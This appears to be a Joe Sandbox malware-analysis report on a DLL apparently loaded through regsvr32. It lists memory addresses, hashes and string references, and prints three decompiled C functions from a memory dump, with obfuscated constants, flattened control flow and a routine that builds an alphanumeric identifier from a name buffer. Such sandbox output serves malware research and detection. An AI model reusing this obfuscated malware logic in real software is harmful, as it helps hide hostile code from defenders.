0x100156eb
0x10015790
0x10015793
0x00000000
0x100156f1
0x100156f7
0x10015779
0x1001577e
0x10015781
0x00000000
0x100156f9
0x100156ff
0x10015765
0x1001576c
0x00000000
0x10015701
0x10015707
0x1001573a
0x1001573e
0x10015743
0x10015746
0x10015748
0x1001574e
0x00000000
0x1001574e
0x10015709
0x1001570f
0x00000000
0x10015715
0x10015725
0x1001572a
0x1001572d
0x00000000
0x1001572d
0x1001570f
0x10015707
0x100156ff
0x100156f7
0x100156eb
0x10015891
0x10015893
0x10015897
0x10015897
0x1001589e
0x1001589e
0x100157bf
0x100157c5
0x10015860
0x10015867
0x00000000
0x100157cb
0x100157cb
0x100157d1
0x10015840
0x10015845
0x10015848
0x00000000
0x100157d3
0x100157d3
0x100157d9
0x10015821
0x10015826
0x10015829
0x00000000
0x100157db
0x100157db
0x100157e1
0x1001588a
0x100157e7
0x100157e7
0x100157ed
0x00000000
0x100157ef
0x100157ff
0x10015804
0x10015807
0x00000000
0x10015807
0x100157ed
0x100157e1
0x100157d9
0x100157d1
0x00000000
0x1001586c
0x1001586c
0x1001586c
0x00000000

Strings

+v+, xrefs: 10015619
NjK(, xrefs: 10015556
p, xrefs: 10015579
*:, xrefs: 10015599
@wm, xrefs: 100154D5

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +v+$@wm$NjK($*:$p
API String ID: 0-875346305
Opcode ID: 1ebc51b0feb217e73918a83adba943cf9f9a9820944c15b19be0da06fcbf4763
Instruction ID: 3e3b1150f93d5933f99cf1de0a070d2992ca4d6d59ce70b16c6cc0bd51cee059
Opcode Fuzzy Hash: 1ebc51b0feb217e73918a83adba943cf9f9a9820944c15b19be0da06fcbf4763
Instruction Fuzzy Hash: 15B18AB1D0020EDBCF58CFA1D9865EEBBB1FF48314F208059D516BA250EB769A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 10009617 Relevance: 6.5, Strings: 5, Instructions: 245
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10009617(void* __ecx, intOrPtr* __edx, char _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _t227;
				intOrPtr _t250;
				intOrPtr* _t252;
				void* _t253;
				intOrPtr* _t258;
				void* _t259;
				void* _t261;
				void* _t264;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				intOrPtr* _t293;
				void* _t294;
				void* _t295;

				_t292 = _a8;
				_t293 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t227);
				_v20 = 0x2c8dc6;
				_t295 = _t294 + 0x18;
				asm("stosd");
				_t261 = 0;
				_t264 = 0xec070ec;
				asm("stosd");
				asm("stosd");
				_v120 = 0xa47a8d;
				_v120 = _v120 + 0x95bd;
				_v120 = _v120 + 0xfffff4d8;
				_t286 = 0x63;
				_v120 = _v120 / _t286;
				_v120 = _v120 ^ 0x0001aab6;
				_v36 = 0xab720e;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x002adc82;
				_v48 = 0x4b8520;
				_t287 = 0x49;
				_v48 = _v48 * 0x35;
				_v48 = _v48 ^ 0x0fa28fa0;
				_v80 = 0xcad769;
				_v80 = _v80 << 0xd;
				_v80 = _v80 >> 0xf;
				_v80 = _v80 ^ 0x0000b5da;
				_v68 = 0x67a63e;
				_v68 = _v68 / _t287;
				_t288 = 0x57;
				_v68 = _v68 * 0x2b;
				_v68 = _v68 ^ 0x003d0da9;
				_v108 = 0x224598;
				_v108 = _v108 * 0x55;
				_v108 = _v108 << 0xf;
				_v108 = _v108 << 3;
				_v108 = _v108 ^ 0x6de00000;
				_v104 = 0x275f8e;
				_v104 = _v104 + 0x7092;
				_v104 = _v104 >> 4;
				_v104 = _v104 + 0xffff89be;
				_v104 = _v104 ^ 0x000206c0;
				_v72 = 0x9e6f02;
				_v72 = _v72 + 0xffff162e;
				_v72 = _v72 << 7;
				_v72 = _v72 ^ 0x4ec1e83f;
				_v44 = 0x9a38d;
				_v44 = _v44 >> 0x10;
				_v44 = _v44 ^ 0x000972bb;
				_v76 = 0x1a5a4a;
				_v76 = _v76 | 0x8f7cc873;
				_v76 = _v76 / _t288;
				_v76 = _v76 ^ 0x01aa64d0;
				_v52 = 0xec545c;
				_v52 = _v52 + 0x1912;
				_v52 = _v52 ^ 0x00edc372;
				_v84 = 0x919590;
				_t289 = 0x13;
				_v84 = _v84 * 0x22;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 ^ 0x0003951f;
				_v88 = 0xd04879;
				_v88 = _v88 ^ 0x983e68c3;
				_v88 = _v88 * 0x77;
				_v88 = _v88 ^ 0x16b73709;
				_v96 = 0x330527;
				_v96 = _v96 << 4;
				_v96 = _v96 + 0x47a5;
				_v96 = _v96 >> 4;
				_v96 = _v96 ^ 0x0032661a;
				_v100 = 0x4e70cf;
				_v100 = _v100 << 7;
				_v100 = _v100 * 0x72;
				_v100 = _v100 / _t289;
				_v100 = _v100 ^ 0x0640c2b6;
				_v56 = 0x447183;
				_t290 = 0x79;
				_v56 = _v56 * 0x42;
				_v56 = _v56 ^ 0xb22198f7;
				_v56 = _v56 ^ 0xa389b510;
				_v60 = 0xac9643;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x110ad290;
				_v60 = _v60 ^ 0x110b3543;
				_v64 = 0x617c5a;
				_v64 = _v64 + 0x6674;
				_v64 = _v64 + 0xcee3;
				_v64 = _v64 ^ 0x00696f44;
				_v112 = 0x656018;
				_v112 = _v112 + 0xffff9383;
				_v112 = _v112 + 0xffffbbf4;
				_v112 = _v112 / _t290;
				_v112 = _v112 ^ 0x0009b80a;
				_v116 = 0x457f8a;
				_v116 = _v116 ^ 0x91db0ff0;
				_v116 = _v116 | 0xbc046a43;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x002f22e6;
				_v40 = 0x2c8408;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x000777cf;
				_v32 = 0x8297b6;
				_v32 = _v32 * 0x68;
				_v32 = _v32 ^ 0x3505f9cc;
				_v92 = 0xd0f4a7;
				_v92 = _v92 >> 0xf;
				_v92 = _v92 + 0x2be5;
				_v92 = _v92 ^ 0xfb375aaa;
				_v92 = _v92 ^ 0xfb3d41ab;
				do {
					while(_t264 != 0x1a3ad2a) {
						if(_t264 == 0x7f3e3d1) {
							_t252 =  *0x1002420c; // 0x0
							_t253 = E100112EF(_v56, _v60, _v108, _v64,  *_t252, _v112,  &_v24, _v24,  *_t292, _t264, _t264,  *((intOrPtr*)(_t292 + 4)), _v116, _v28, _v36, _v40);
							_t295 = _t295 + 0x38;
							if(_t253 == _v104) {
								 *_t293 = _v28;
								_t261 = 1;
								_a4 = _v24;
							} else {
								_t264 = 0xf58b8e4;
								continue;
							}
						} else {
							if(_t264 == 0xc751008) {
								_t197 =  &_v120; // 0x2f22e6
								_t258 =  *0x1002420c; // 0x0
								_t259 = E100112EF(_v72, _v44, _v48, _v76,  *_t258, _v52,  &_v24, _v80,  *_t292, _t264, _t264,  *((intOrPtr*)(_t292 + 4)), _v84, _t261,  *_t197, _v88);
								_t295 = _t295 + 0x38;
								if(_t259 == _v68) {
									_t264 = 0x1a3ad2a;
									continue;
								}
							} else {
								if(_t264 == 0xec070ec) {
									_t264 = 0xc751008;
									continue;
								} else {
									if(_t264 != 0xf58b8e4) {
										goto L15;
									} else {
										E10006A8D(_v32, _v92, _v28);
									}
								}
							}
						}
						L18:
						return _t261;
					}
					_push(_t264);
					_t250 = E1001EAA3(_v24);
					_v28 = _t250;
					if(_t250 == 0) {
						_t264 = 0xcae2f48;
						goto L15;
					} else {
						_t264 = 0x7f3e3d1;
						continue;
					}
					goto L18;
					L15:
				} while (_t264 != 0xcae2f48);
				goto L18;
			}

0x1000961d
0x10009624
0x10009627
0x1000962e
0x10009635
0x10009636
0x1000963d
0x1000963e
0x1000963f
0x10009644
0x10009658
0x1000965b
0x1000965e
0x10009660
0x10009667
0x10009668
0x10009669
0x10009671
0x10009679
0x10009685
0x1000968a
0x10009690
0x10009698
0x100096a0
0x100096a5
0x100096ad
0x100096ba
0x100096bd
0x100096c1
0x100096c9
0x100096d1
0x100096d6
0x100096db
0x100096e3
0x100096f3
0x100096fc
0x100096fd
0x10009701
0x10009709
0x10009716
0x1000971a
0x1000971f
0x10009724
0x1000972c
0x10009734
0x1000973c
0x10009741
0x10009749
0x10009751
0x10009759
0x10009761
0x10009766
0x1000976e
0x10009776
0x1000977b
0x10009783
0x1000978b
0x10009799
0x1000979d
0x100097a5
0x100097ad
0x100097b7
0x100097bf
0x100097ce
0x100097d1
0x100097d5
0x100097da
0x100097e2
0x100097ea
0x100097f7
0x100097fb
0x10009803
0x1000980b
0x10009810
0x10009818
0x1000981d
0x10009825
0x1000982d
0x10009837
0x10009843
0x10009847
0x1000984f
0x1000985c
0x1000985d
0x10009861
0x10009869
0x10009871
0x10009879
0x1000987e
0x10009886
0x1000988e
0x10009896
0x1000989e
0x100098a6
0x100098ae
0x100098b6
0x100098be
0x100098d1
0x100098d5
0x100098dd
0x100098e5
0x100098ed
0x100098f5
0x100098fa
0x10009902
0x1000990a
0x1000990f
0x10009917
0x10009924
0x10009928
0x10009930
0x10009938
0x1000993d
0x10009945
0x1000994d
0x10009955
0x10009955
0x10009963
0x10009a24
0x10009a41
0x10009a46
0x10009a4d
0x10009a97
0x10009a9a
0x10009a9f
0x10009a4f
0x10009a4f
0x00000000
0x10009a4f
0x10009969
0x1000996f
0x100099ab
0x100099c7
0x100099e4
0x100099e9
0x100099f0
0x100099f6
0x00000000
0x100099f6
0x10009971
0x10009977
0x1000999c
0x00000000
0x10009979
0x1000997f
0x00000000
0x10009985
0x10009991
0x10009996
0x1000997f
0x10009977
0x1000996f
0x10009aa5
0x10009aab
0x10009aab
0x10009a61
0x10009a66
0x10009a6b
0x10009a72
0x10009a7e
0x00000000
0x10009a74
0x10009a74
0x00000000
0x10009a74
0x00000000
0x10009a83
0x10009a83
0x00000000

Strings

Doi, xrefs: 100098A6
"/, xrefs: 10009681
"/, xrefs: 100099AB
+, xrefs: 1000993D
\T, xrefs: 100097A5

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Doi$\T$"/$"/$+
API String ID: 0-3147750428
Opcode ID: b685bb835e17ffaa055a7e3a24b613941c1377cfb54fb2619e874f971082fef7
Instruction ID: dcc04c5352647fa3499d9eeee2f1bc4a522935b34c6d7b0e71b0125efbb2e226
Opcode Fuzzy Hash: b685bb835e17ffaa055a7e3a24b613941c1377cfb54fb2619e874f971082fef7
Instruction Fuzzy Hash: 8EC11F715083809FD368CF66C88990BBBE2FBC5388F508A1DF69586260D3B2C949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100213FD Relevance: 6.5, Strings: 5, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E100213FD(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				void* _t249;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				void* _t274;
				void* _t275;
				signed int* _t278;
				signed int* _t279;

				_t278 =  &_v104;
				_v80 = 0x4d02c9;
				_t274 = __edx;
				_t249 = __ecx;
				_t275 = 0x3de9b9f;
				_t251 = 6;
				_v80 = _v80 / _t251;
				_v80 = _v80 | 0xf5fbffc7;
				_v80 = _v80 ^ 0xf5ffffcf;
				_v88 = 0x350ed9;
				_v88 = _v88 << 5;
				_v88 = _v88 + 0x130;
				_v88 = _v88 * 0x42;
				_v88 = _v88 ^ 0xb5bacca0;
				_v104 = 0xc8a9ce;
				_v104 = _v104 ^ 0x8cb4b42e;
				_v104 = _v104 ^ 0x7d2775df;
				_v104 = _v104 + 0xffff6404;
				_v104 = _v104 ^ 0xf159e193;
				_v36 = 0x8526cf;
				_v36 = _v36 >> 1;
				_v36 = _v36 ^ 0x004851e8;
				_v72 = 0xb4f6f4;
				_v72 = _v72 >> 9;
				_v72 = _v72 << 5;
				_v72 = _v72 ^ 0x00083cfe;
				_v40 = 0xb1915d;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x2c653368;
				_v32 = 0xfc8e4e;
				_v32 = _v32 * 0x69;
				_v32 = _v32 ^ 0x6797a3bf;
				_v96 = 0x8cbc0f;
				_v96 = _v96 ^ 0xf1ba02a2;
				_v96 = _v96 * 0x47;
				_v96 = _v96 * 0x35;
				_v96 = _v96 ^ 0xa7b8e43a;
				_v68 = 0x7ca112;
				_v68 = _v68 + 0x9b1b;
				_v68 = _v68 | 0xa53c31bd;
				_v68 = _v68 ^ 0xa57de871;
				_v100 = 0x296481;
				_v100 = _v100 + 0xffffe028;
				_v100 = _v100 << 3;
				_v100 = _v100 >> 0xd;
				_v100 = _v100 ^ 0x0001d725;
				_v24 = 0x8220bd;
				_v24 = _v24 + 0xffff54be;
				_v24 = _v24 ^ 0x00874ff6;
				_v64 = 0x2024fb;
				_v64 = _v64 + 0xffff5aea;
				_v64 = _v64 + 0xffff1be8;
				_v64 = _v64 ^ 0x001b07f7;
				_v28 = 0x2a1427;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x000dd55c;
				_v92 = 0xa78f1d;
				_v92 = _v92 + 0xffffebb1;
				_v92 = _v92 + 0xb454;
				_v92 = _v92 + 0xffffbe66;
				_v92 = _v92 ^ 0x00aa59a8;
				_v52 = 0x8ed399;
				_v52 = _v52 >> 0xf;
				_v52 = _v52 ^ 0x8a20a28a;
				_v52 = _v52 ^ 0x8a255a15;
				_v56 = 0x703d0c;
				_v56 = _v56 ^ 0xd56262a1;
				_v56 = _v56 * 0x73;
				_v56 = _v56 ^ 0xb7465852;
				_v60 = 0xf93510;
				_v60 = _v60 + 0xffff8a92;
				_v60 = _v60 >> 4;
				_v60 = _v60 ^ 0x000f275f;
				_v20 = 0x128483;
				_v20 = _v20 + 0x4c2a;
				_v20 = _v20 ^ 0x00183ff9;
				_v12 = 0xc13c7d;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0x4f103dc5;
				_v84 = 0x53c5b8;
				_v84 = _v84 + 0xffff6a05;
				_t252 = 0x5b;
				_v84 = _v84 / _t252;
				_t253 = 0x1e;
				_v84 = _v84 * 0x30;
				_v84 = _v84 ^ 0x002d5c41;
				_v44 = 0x13004a;
				_v44 = _v44 | 0xe9a51367;
				_v44 = _v44 + 0x29be;
				_v44 = _v44 ^ 0xe9bf151b;
				_v16 = 0x989a0e;
				_v16 = _v16 / _t253;
				_v16 = _v16 ^ 0x000251e1;
				_v48 = 0x3364d1;
				_t254 = 0x11;
				_v48 = _v48 * 0x2b;
				_v48 = _v48 * 0x7a;
				_v48 = _v48 ^ 0x1d20fce4;
				_v4 = 0x133a74;
				_v4 = _v4 / _t254;
				_v4 = _v4 ^ 0x0003b3cf;
				_v76 = 0xbc8784;
				_v76 = _v76 ^ 0x293a99e3;
				_v76 = _v76 ^ 0x157d6a23;
				_v76 = _v76 + 0xffff75f0;
				_v76 = _v76 ^ 0x3cf9fc34;
				_v8 = 0x450528;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x008d1ced;
				while(1) {
					L1:
					_t243 = 0x50918d2;
					do {
						L2:
						while(_t275 != 0x3de9b9f) {
							if(_t275 == _t243) {
								_push(_t254);
								_push(_t254);
								_t254 = _v12;
								_t244 = E1001AA59(_t254, _t274, _v80, _v84, E100063B8, _v88, _v44, _v16, _v48);
								_t278 =  &(_t278[9]);
								 *((intOrPtr*)(_t274 + 8)) = _t244;
								__eflags = _t244;
								if(__eflags == 0) {
									_t275 = 0xefebf54;
									goto L1;
								}
							} else {
								if(_t275 == 0x55899f7) {
									_t254 = _v52;
									_t245 = E10010F57(_t254, _v56, _v60,  *((intOrPtr*)(_t274 + 0x24)), _v20);
									_t278 =  &(_t278[3]);
									 *((intOrPtr*)(_t274 + 0x1c)) = _t245;
									__eflags = _t245;
									_t243 = 0x50918d2;
									_t275 =  !=  ? 0x50918d2 : 0xefebf54;
									continue;
								} else {
									if(_t275 == 0x76718d4) {
										_t244 = E10003C51(_v104, __eflags, _v36, _v72, _v40, _t249);
										_t279 =  &(_t278[4]);
										 *((intOrPtr*)(_t274 + 0x24)) = _t244;
										__eflags = _t244;
										if(_t244 != 0) {
											E10021872( *((intOrPtr*)(_t274 + 0x24)), _v32, _v96,  *((intOrPtr*)(_t274 + 0x24)), _v68, _v100);
											_t254 = _v24;
											E10010E0B( *((intOrPtr*)(_t274 + 0x24)), _v64, _v28, _v92);
											_t278 =  &(_t279[7]);
											_t275 = 0x55899f7;
											while(1) {
												L1:
												_t243 = 0x50918d2;
												goto L2;
											}
										}
									} else {
										if(_t275 == 0xefebf54) {
											return E10010F7A(_v4, _v76, _v8,  *((intOrPtr*)(_t274 + 0x24)));
										}
										goto L15;
									}
								}
							}
							return _t244;
						}
						_t275 = 0x76718d4;
						L15:
						__eflags = _t275 - 0x6f21388;
					} while (__eflags != 0);
					return _t243;
				}
			}

0x100213fd
0x10021400
0x10021410
0x10021412
0x10021418
0x1002141d
0x10021420
0x10021424
0x1002142c
0x10021434
0x1002143c
0x10021441
0x1002144e
0x10021452
0x1002145a
0x10021462
0x1002146a
0x10021472
0x1002147a
0x10021482
0x1002148a
0x1002148e
0x10021496
0x1002149e
0x100214a3
0x100214a8
0x100214b0
0x100214b8
0x100214bd
0x100214c5
0x100214d2
0x100214d6
0x100214de
0x100214e6
0x100214f3
0x100214fc
0x10021500
0x10021508
0x10021510
0x10021518
0x10021520
0x10021528
0x10021530
0x10021538
0x1002153d
0x10021542
0x1002154a
0x10021552
0x1002155a
0x10021562
0x1002156a
0x10021572
0x1002157a
0x10021582
0x1002158a
0x1002158f
0x10021597
0x1002159f
0x100215a7
0x100215af
0x100215b7
0x100215bf
0x100215c7
0x100215cc
0x100215d4
0x100215dc
0x100215e4
0x100215f1
0x100215f5
0x100215fd
0x10021607
0x10021614
0x10021619
0x10021621
0x10021629
0x10021631
0x10021639
0x10021641
0x10021646
0x1002164e
0x10021656
0x10021664
0x10021669
0x10021674
0x10021677
0x1002167b
0x10021683
0x1002168b
0x10021693
0x1002169b
0x100216a3
0x100216b3
0x100216b7
0x100216bf
0x100216cc
0x100216cd
0x100216d6
0x100216da
0x100216e2
0x100216f0
0x100216f4
0x100216fc
0x10021704
0x1002170c
0x10021714
0x1002171c
0x10021724
0x1002172c
0x10021730
0x10021738
0x10021738
0x10021738
0x1002173d
0x00000000
0x1002173d
0x1002174b
0x1002181a
0x1002181b
0x1002183b
0x10021842
0x10021847
0x1002184a
0x1002184d
0x1002184f
0x10021855
0x00000000
0x10021855
0x10021751
0x10021757
0x100217fa
0x100217fe
0x10021803
0x10021806
0x10021809
0x1002180d
0x10021812
0x00000000
0x1002175d
0x10021763
0x1002179c
0x100217a1
0x100217a4
0x100217a7
0x100217a9
0x100217c1
0x100217d5
0x100217d9
0x100217de
0x100217e1
0x10021738
0x10021738
0x10021738
0x00000000
0x10021738
0x10021738
0x10021765
0x10021767
0x00000000
0x10021782
0x00000000
0x10021767
0x10021763
0x10021757
0x1002178a
0x1002178a
0x1002185c
0x10021861
0x10021861
0x10021861
0x00000000
0x1002173d

Strings

J, xrefs: 10021683
*L, xrefs: 10021629
QH, xrefs: 1002148E
h3e,, xrefs: 100214BD
A\-, xrefs: 1002167B

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *L$A\-$J$h3e,$QH
API String ID: 0-4100447355
Opcode ID: 1e49f745321671ed57bbd037a7c2ef28e3da32b4411521c8904073687e4388e3
Instruction ID: 2ee5be9e00fd5d4824a669d09c94ed07b76c59fc695d2777e8fde3a6ad19f8d1
Opcode Fuzzy Hash: 1e49f745321671ed57bbd037a7c2ef28e3da32b4411521c8904073687e4388e3
Instruction Fuzzy Hash: 92B10B72408781ABC358CF65D98A40BFBF1FB88748F508A1DF5A596260D7B1DA49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 100203F2 Relevance: 6.5, Strings: 5, Instructions: 217
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E100203F2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				void* _t194;
				signed int _t215;
				void* _t217;
				void* _t224;
				char* _t225;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int* _t263;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t194);
				_v148 = 0xc02b87;
				_t263 =  &(( &_v204)[5]);
				_v148 = _v148 | 0xbb6c7e71;
				_v148 = _v148 ^ 0x18905142;
				_t224 = 0x6ee8ef9;
				_v148 = _v148 ^ 0xa372696e;
				_v164 = 0x5d0e2f;
				_v164 = _v164 ^ 0x565bbc53;
				_v164 = _v164 << 9;
				_v164 = _v164 ^ 0x0d622cdb;
				_v184 = 0x3207b8;
				_v184 = _v184 | 0x6d6cbbc3;
				_t252 = 0xa;
				_v184 = _v184 * 0x78;
				_v184 = _v184 / _t252;
				_v184 = _v184 ^ 0x0852d2d5;
				_v200 = 0x18b8b;
				_v200 = _v200 >> 7;
				_v200 = _v200 + 0x6fef;
				_v200 = _v200 >> 4;
				_v200 = _v200 ^ 0x000d48e2;
				_v204 = 0xa6d344;
				_t253 = 0x1f;
				_v204 = _v204 / _t253;
				_v204 = _v204 << 4;
				_v204 = _v204 << 0xb;
				_v204 = _v204 ^ 0xb0d1ae88;
				_v140 = 0x39605e;
				_t54 =  &_v140; // 0x39605e
				_t254 = 0x12;
				_v140 =  *_t54 * 0x2a;
				_v140 = _v140 | 0xa25ac5e7;
				_v140 = _v140 ^ 0xab78becd;
				_v176 = 0x3ee401;
				_v176 = _v176 ^ 0x70cf1922;
				_v176 = _v176 * 0x5b;
				_v176 = _v176 ^ 0x2601c1e9;
				_v192 = 0x54878b;
				_v192 = _v192 + 0x3724;
				_v192 = _v192 * 0x25;
				_v192 = _v192 >> 0x10;
				_v192 = _v192 ^ 0x0009f13a;
				_v196 = 0xf7a7c5;
				_v196 = _v196 / _t254;
				_v196 = _v196 * 0x70;
				_v196 = _v196 ^ 0xc79b92a6;
				_v196 = _v196 ^ 0xc190ff3b;
				_v156 = 0x454799;
				_v156 = _v156 ^ 0xc7849e70;
				_v156 = _v156 ^ 0x3ebd2df0;
				_v156 = _v156 ^ 0xf97cdd87;
				_v168 = 0x76cf4e;
				_v168 = _v168 ^ 0x6bd69a4c;
				_v168 = _v168 >> 0x10;
				_v168 = _v168 ^ 0x0005a0c8;
				_v136 = 0xd0ef0d;
				_t255 = 0x5d;
				_v136 = _v136 / _t255;
				_v136 = _v136 ^ 0x000c9118;
				_v188 = 0x7493a6;
				_t256 = 0x18;
				_v188 = _v188 * 0xd;
				_v188 = _v188 ^ 0xe08a7ad8;
				_v188 = _v188 + 0xffffbd07;
				_v188 = _v188 ^ 0xe56228f7;
				_v172 = 0x883df9;
				_v172 = _v172 + 0xffff2f7a;
				_v172 = _v172 ^ 0x00a0db73;
				_v172 = _v172 ^ 0x002aece7;
				_v144 = 0x964178;
				_v144 = _v144 >> 9;
				_v144 = _v144 ^ 0x669fa0c2;
				_v144 = _v144 ^ 0x669d070d;
				_v152 = 0xf8f9a;
				_v152 = _v152 << 9;
				_v152 = _v152 >> 4;
				_v152 = _v152 ^ 0x01f3fa47;
				_v160 = 0xd7aa4f;
				_v160 = _v160 + 0xffffc848;
				_v160 = _v160 / _t256;
				_v160 = _v160 ^ 0x0006bb5f;
				_v180 = 0x7439c2;
				_t257 = 0x77;
				_v180 = _v180 / _t257;
				_t258 = 0x7f;
				_t215 = _v180 / _t258;
				_v180 = _t215;
				_v180 = _v180 << 5;
				_v180 = _v180 ^ 0x000cfe2d;
				do {
					while(_t224 != 0x34854d0) {
						if(_t224 == 0x6046b9f) {
							_v132 = 0x80;
							_t215 = E10006BFA(_v148,  &_v132, _v164, _v184, _v200,  &_v128);
							_t263 =  &(_t263[4]);
							_t224 = 0x34854d0;
							continue;
						}
						if(_t224 == 0x6ee8ef9) {
							_t224 = 0x6046b9f;
							continue;
						}
						_t270 = _t224 - 0xde1ef7a;
						if(_t224 != 0xde1ef7a) {
							goto L19;
						}
						_push(E10001000);
						_push(_v192);
						_t171 =  &_v176; // 0x2aece7
						_push( *_t171);
						_t217 = E1001E18B(_v204, _v140, _t270);
						E1001EF56(_v168, _t270, _t217, _v136, _v196, _v188,  &_v128, E1001112D(_v196, _t270), _v172, _v144);
						return E1000B9D7(_v152, _v160, _t217, _v180);
					}
					__eflags = _v128;
					_t225 =  &_v128;
					if(_v128 == 0) {
						L18:
						_t224 = 0xde1ef7a;
						goto L19;
					} else {
						goto L10;
					}
					do {
						L10:
						_t215 =  *_t225;
						__eflags = _t215 - 0x30;
						if(_t215 < 0x30) {
							L12:
							__eflags = _t215 - 0x61;
							if(_t215 < 0x61) {
								L14:
								__eflags = _t215 - 0x41;
								if(_t215 < 0x41) {
									L16:
									 *_t225 = 0x58;
									goto L17;
								}
								__eflags = _t215 - 0x5a;
								if(_t215 <= 0x5a) {
									goto L17;
								}
								goto L16;
							}
							__eflags = _t215 - 0x7a;
							if(_t215 <= 0x7a) {
								goto L17;
							}
							goto L14;
						}
						__eflags = _t215 - 0x39;
						if(_t215 <= 0x39) {
							goto L17;
						}
						goto L12;
						L17:
						_t225 = _t225 + 1;
						__eflags =  *_t225;
					} while ( *_t225 != 0);
					goto L18;
					L19:
					__eflags = _t224 - 0xbee480f;
				} while (__eflags != 0);
				return _t215;
			}

0x100203fc
0x10020405
0x1002040c
0x10020413
0x10020414
0x10020415
0x1002041a
0x10020422
0x10020425
0x1002042f
0x10020437
0x1002043c
0x10020444
0x1002044c
0x10020454
0x10020459
0x10020461
0x10020469
0x10020478
0x1002047b
0x10020487
0x1002048b
0x10020493
0x1002049b
0x100204a0
0x100204a8
0x100204ad
0x100204b5
0x100204c1
0x100204c6
0x100204cc
0x100204d1
0x100204d6
0x100204de
0x100204e6
0x100204eb
0x100204ec
0x100204f0
0x100204f8
0x10020500
0x10020508
0x10020515
0x10020519
0x10020521
0x10020529
0x10020536
0x1002053a
0x1002053f
0x10020547
0x10020555
0x1002055e
0x10020562
0x1002056a
0x10020572
0x1002057a
0x10020582
0x1002058a
0x10020592
0x1002059a
0x100205a2
0x100205a7
0x100205b1
0x100205c9
0x100205ce
0x100205d4
0x100205dc
0x100205e9
0x100205ec
0x100205f0
0x100205f8
0x10020600
0x10020608
0x10020610
0x10020618
0x10020620
0x10020628
0x10020630
0x10020635
0x1002063d
0x10020645
0x1002064d
0x10020652
0x10020657
0x1002065f
0x10020667
0x10020677
0x1002067b
0x10020683
0x1002068f
0x10020694
0x1002069e
0x1002069f
0x100206a6
0x100206aa
0x100206af
0x100206b7
0x100206b7
0x100206c1
0x10020751
0x1002076e
0x10020773
0x10020776
0x00000000
0x10020776
0x100206cd
0x10020746
0x00000000
0x10020746
0x100206cf
0x100206d1
0x00000000
0x00000000
0x100206d7
0x100206dc
0x100206e0
0x100206e0
0x100206ec
0x10020721
0x00000000
0x10020738
0x1002077d
0x10020782
